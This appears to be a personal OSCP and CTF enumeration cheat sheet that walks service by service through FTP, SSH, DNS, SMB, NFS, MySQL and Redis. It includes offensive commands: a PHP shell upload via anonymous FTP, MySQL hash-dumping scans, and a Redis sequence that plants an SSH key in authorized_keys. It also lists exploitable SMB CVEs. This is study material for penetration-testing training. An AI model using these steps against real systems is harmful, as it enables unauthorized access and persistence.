Enumeration
https://github.com/s0wr0b1ndef/OSCP-note/
Disclaimer: These notes are not in the context of any machines I had during the OSCP lab or exam. This is purely my experience with CTFs, Tryhackme, Vulnhub, and Hackthebox prior to enrolling in OSCP. This is an approach I came up with while researching on offensive security. It contains contents from other blogs for my quick reference
Port Scanning :
Scanning all 65535 ports :
sC - default scripts, sV - scan for versions, oA- output all formats
Optional - sT (performs full scan instead of syn-scan to prevent getting flagged by firewalls)
From Apache Version to finding Ubuntu version -> ubuntu httpd versions
FTP : (Port 21)
anonymous login check
ftp <ip address>
username : anonymous
pwd : anonymous
file upload -> put shell.php
SSH : (Port 22)
id_rsa.pub : Public key that can be used in authorized_keys for login
id_rsa : Private key that is used for login. Might ask for password. can be cracked with ssh2john
and john
id_rsa
ssh -i id_rsa user@10.10.10.x
For passwordless login, add id_rsa.pub to target's authorized_keys
ssh2john
DNS Zone transfer check : (Port 53)
If port 53 is open
Add host to /etc/hosts
dig axfr smasher.htb @10.10.10.135
Add the extracted domain to /etc/hosts and dig again
RPC Bind (111)
RPC (135)
SMB (139 & 445)
https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
SMB Exploits :
Samba "username map script" Command Execution - CVE-2007-2447
Version 3.0.20 through 3.0.25rc3
Samba-usermap-exploit.py - https://gist.github.com/joenorton8014/19aaa00e0088738fc429cff2669b9851
Eternal Blue - CVE-2017-0144
SMB v1 in Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016
SambaCry - CVE-2017-7494
4.5.9 version and before
SNMP (161)
IRC (194,6667,6660-7000)
nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 irked.htb
NFS (2049)
showmount -e 10.1.1.27
mkdir /mnt/nfs
mount -t nfs 192.168.2.4:/nfspath-shown /mnt/nfs
Permission Denied ? (https://blog.christophetd.fr/write-up-vulnix/)
MYSQL (3306)
nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
Redis (6379)
In the output of config get * you could find the home of the redis user (usually /var/lib/redis or /home/redis/.ssh), and knowing this you know where you can write the authenticated_users file to access via ssh with the user redis. If you know the home of other valid user where you have writable permissions you can also abuse it:
Generate a ssh public-private key pair on your pc:
ssh-keygen -t rsa
Write the public key to a file :
(echo -e "\n\n"; cat ./.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt
Import the file into redis :
cat foo.txt | redis-cli -h 10.10.10.10 -x set crackit
Save the public key to the
authorized_keys
file on redis server:
Port Knocking :
Misc :
IF NOTHING WORKS
Last updated